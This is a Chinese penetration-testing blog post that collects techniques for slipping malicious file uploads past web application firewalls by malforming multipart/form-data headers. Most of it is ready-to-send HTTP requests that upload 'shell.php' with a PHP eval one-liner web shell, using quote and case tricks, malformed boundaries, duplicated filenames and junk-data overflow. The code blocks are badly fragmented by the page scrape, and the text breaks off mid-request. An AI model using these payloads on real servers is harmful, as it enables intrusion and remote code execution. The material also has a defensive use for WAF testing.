干货 | 最全的文件上传漏洞之WAF拦截绕过总结

于 2024-09-29 01:48:44 发布
阅读量170 收藏 3
点赞数 2
分类专栏: 渗透测试 文章标签: 安全测试 网络安全 Web安全 文件上传WAF绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/142624915
版权

干货 | 最全的文件上传漏洞之WAF拦截绕过总结

HTTP文件上传数据包解析

文件上传实质上还是客户端的POST请求,消息主体是一些上传信息。前端上传页面需要指定 enctype为multipart/from-data才能正常上传文件。

一个正常的文件上传数据包大致如下:


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     POST http:
     
     /
     
     /www.example.com HTTP
     
     /
     
     1.1
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type:multipart
     
     /form-data; boundary
     
     =----WebKitFormBoundaryyb
     
     1zYhTI
     
     38xpQxBK
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryyb
     
     1zYhTI
     
     38xpQxBK
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "city_id"
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     1
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryyb
     
     1zYhTI
     
     38xpQxBK
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "company_id"
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     2
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryyb
     
     1zYhTI
     
     38xpQxBK
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "file"; filename
     
     =
     
     "chrome.png"
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image
     
     /png
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PNG ... 
     
     content 
     
     of chrome.png ...
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryyb
     
     1zYhTI
     
     38xpQxBK--

从中获取特征为:

•请求Header中Content-Type存在以下特征:•multipart/form-data:表示该请求是一个文件上传请求•存在boundary字符串:作用为分隔符,以区分POST数据•POST的内容存在以下特征:•Content-Disposition:响应标头是指示内容是否预期在浏览器中内联显示的标题。•name:包含该字段的内容引用的 HTML 字段的名称。•filename:后面是一个包含传输文件的原始名称的字符串。•POST中的boundary的值就是Content-Type的值在最前面加了两个--,除了最后标识结束的boundary•最后标识结束的boundary最后默认会多出两个--(测试时,最后一行的boundary删掉也能成功上传)

文件上传在数据包中可修改的地方

Content-Disposition:一般可更改•name:表单参数值,不能更改•filename:文件名,可以更改•Content-Type:文件 MIME,视情况更改•boundary:内容划分,可以更改

WAF如何拦截恶意文件

可以先自己想象一下,如果让你来写WAF,你会从哪几个角度去防御。

•文件名•解析文件名,判断是否在黑名单内。•文件内容•解析文件内容,判断是否为webshell。•文件目录权限•该功能需要主机WAF实现。

目前,市面上常见的是解析文件名,少数WAF是解析文件内容,比如长亭。下面内容,都是基于文件名解析。

大致步骤如下:

1.获取Request Header里的Content-Type值中获取boundary值2.根据第一步的boundary值,解析POST数据,获取文件名3.判断文件名是否在拦截黑名单内/白名单外

了解了WAF如何对恶意文件进行拦截之后,我将常见的绕过方法分为如下几类,最后再使用目前最新版的安全狗进行绕过演示。

字符变异

引号变换

头部字段的值既可以添加单引号也可以添加双引号还可以不加引号,都不会影响上传结果。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: 
     
     "form-data"; name
     
     =
     
     file_x; filename
     
     =
     
     "xx.php"
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     file_x; filename
     
     =
     
     "xx.php"
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     file_x; filename
     
     =xx.php
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "file_x"; filename
     
     =xx.php
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     'file_x'; filename
     
     =
     
     'xx.php'
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: 
     
     'form-data'; name
     
     =
     
     "file_x"; filename
     
     =
     
     'xx.php'

可以去除掉filename字符串中末尾的引号,也能够正常上传


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "file_x"; filename
     
     =
     
     "xx.php
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name="
     
     file_x
     
     "; filename='xx.php
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name="
     
     file_x
     
     "; filename="xx.php;
大小写变换

对这三个固定的字符串进行大小写转换

•Content-Disposition•name•filename

比如name转换成NameContent-Disposition转换成content-disposition

添加换行符

字段值与等号之间可以加入换行符,依然可以正常上传,下面我使用[0x09]代替换行符


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: 
     
     "form-data"; name
     
     =
     
     "file_x"; filename
     
     =[
     
     0x
     
     09]
     
     "xx.php"
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: 
     
     "form-data"; name
     
     =
     
     "file_x"; filename
     
     =[
     
     0x
     
     09]
     
     "xx.php
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: "form-data
     
     "; name="
     
     file_x
     
     "; filename=[0x09]"xx.php
     
     "[0x09]
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: "form-data
     
     "; name="
     
     file_x
     
     "; filename=[0x09]xx.php
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: "form-data
     
     "; name="
     
     file_x
     
     "; filename=[0x09]xx.php[0x09];
多个分号

文件解析时,可能因为分号解析不到文件名,导致绕过。

Content-Disposition: form-data; name="file_x";;; filename="test.php"
多个等号

在POST的内容中使用多个等号对文件上传也没有影响。

Content-Disposition: form-data; name=="file_x"; filename===="test.php"
变换Content-Disposition的值

某些WAF在解析的时候,认为Content-Disposition值一定是form-data,造成绕过。其实Content-Disposition可以任意变换或为空。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: fOrM-DaTA; name
     
     =
     
     "file_x"; filename
     
     =
     
     "xx.php"
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-da
     
     +ta; name
     
     =
     
     "file_x"; filename
     
     =
     
     "xx.php"
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: fo    r m-dat a; name
     
     =
     
     "file_x"; filename
     
     =
     
     "xx.php"
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-dataxx; name
     
     =
     
     "file_x"; filename
     
     =
     
     "xx.php"
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: name
     
     =
     
     "file_x"; filename
     
     =
     
     "xx.php"
畸形的boundary头部

boundary可以变化为如下形式,且不影响上传:

正常的boundary

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111

畸形的boundary

multipart/form-data大小写可变:

Content-Type: mUltiPart/ForM-dATa; boundary=----WebKitFormBoundarye111

multipart/form-databoundary之间可以使用空格分隔,且中间可以插入任何值:


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-
     
     Type: multipart/form-
     
     data boundary=----WebKitFormBoundarye111
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-
     
     Type: multipart/form-
     
     data x boundary=----WebKitFormBoundarye111
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-
     
     Type: multipart/form-
     
     data abcdefg boundary=----WebKitFormBoundarye111
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-
     
     Type: multipart/form-
     
     data a\|/?!@#$%^() boundary=----WebKitFormBoundarye111

multipart/form-databoundary之间可以使用逗号分隔,且中间可以插入任何值:


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-
     
     Type: multipart/form-
     
     data,boundary=----WebKitFormBoundarye111
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-
     
     Type: multipart/form-
     
     data,x,boundary=----WebKitFormBoundarye111
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-
     
     Type: multipart/form-
     
     data,abcdefg,boundary=----WebKitFormBoundarye111
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-
     
     Type: multipart/form-
     
     data,a\|/?!@#$%^(),boundary=----WebKitFormBoundarye111

boundary之前可以直接加入任何值(PHP可行):


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data;bypass
     
     &
     
     123
     
     **{|}boundary
     
     =----WebKitFormBoundarye
     
     111
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data bypass
     
     &
     
     123
     
     **{|}boundary
     
     =----WebKitFormBoundarye
     
     111
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data,bypass
     
     &
     
     123
     
     **{|}boundary
     
     =----WebKitFormBoundarye
     
     111

boundary末尾可以使用逗号或分号隔开插入任何值


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data; boundary
     
     =----WebKitFormBoundarye
     
     111;
     
     123abc
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data; boundary
     
     =----WebKitFormBoundarye
     
     111,123abc

顺序颠倒

交换name和filename的顺序

因为规定了Content-Disposition必须在最前面,所以只能交换name和filename的顺序。

有的WAF可能会匹配name在前面,filename在后面,可以导致绕过。

Content-Disposition: form-data; filename="xx.php"; name="file_x"
交换Content-Disposition和Content-Type的顺序

与上述一样,Content-Disposition和Content-Type也是能够交换顺序的。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image
     
     /png
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "upload_file"; filename
     
     =
     
     "shell.php"
交换不同boundary内容的顺序

不同boundary内容也能够交换,且不影响文件上传


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "submit"
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     上传
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "upload_file"; filename
     
     =
     
     "shell.php"
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image
     
     /png
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <?php @eval($_POST[
     
     'x']);?
     
     >
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf--

数据重复

boundary内容重复

最后上传的文件是shell.php而非shell.jpg,但是如果取的文件名时只取了第一个就会被Bypass。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name=
     
     "upload_file"; filename=
     
     "shell.jpg"
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image/png
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <?php @
     
     eval(
     
     $_POST[
     
     'hack']); 
     
     ?>
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name=
     
     "upload_file"; filename=
     
     "shell.php"
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image/png
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <?php @
     
     eval(
     
     $_POST[
     
     'hack']); 
     
     ?>
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name=
     
     "submit"
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     上传
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA--

下面这样也是可以正常上传的


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA--
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA;
     
     123
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name=
     
     "upload_file"; filename=
     
     "shell.php"
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image/png
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <?php @
     
     eval(
     
     $_POST[
     
     'hack']); 
     
     ?>
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name=
     
     "submit"
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     上传
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundarymeEzpUTMsmOfjwAA--
filename重复

最终上传成功的文件名是shell.php。但是由于解析文件名时,会解析到第一个。正则默认都会匹配到第一个。

Content-Disposition: form-data; name="upload_file"; filename="shell.jpg filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.jpg"; filename="shell.php";

数据溢出

name与filename之间插入垃圾数据

name与filename之间插入大量垃圾数据。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     POST 
     
     /Pass-
     
     02
     
     /
     
     index.php HTTP
     
     /
     
     1.1
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Host: hackrock.com:
     
     813
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data; boundary
     
     =----WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Connection: 
     
     close
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "upload_file"; fbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf; 
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     filename
     
     =
     
     "shell.php"
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image
     
     /png
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <?php @eval($_POST[
     
     'x']);?
     
     >
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "submit"
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     上传
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1
     
     rf--

注:需在大量垃圾数据后加“;”

boundary字符串中加入垃圾数据

boundray字符串的值可以为任何数据(有一定的长度限制),当长度达到WAF无法处理时,而Web服务器又能够处理,那么就可以绕过WAF上传文件。


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     POST 
     
     /Pass-
     
     01
     
     /
     
     index.php HTTP
     
     /
     
     1.1
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Host: hackrock.com:
     
     813
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: multipart
     
     /form-data; boundary
     
     =----WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bfWebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Connection: 
     
     close
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8659f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bfWebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     8dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Disposition: form-data; name
     
     =
     
     "upload_file";filename
     
     =
     
     "shell.php"
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Content-Type: image
     
     /png
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <?php @eval($_POST[
     
     'x']);?
     
     >
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ------WebKitFormBoundaryzEHC
     
     1GyG
     
     8wYOH
     
     1rffbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
     8658dafbf
     
     0
     
     fd
     
     31ead
     
     48dcc
     
     0b
     
     9f
     
     2312bf
     
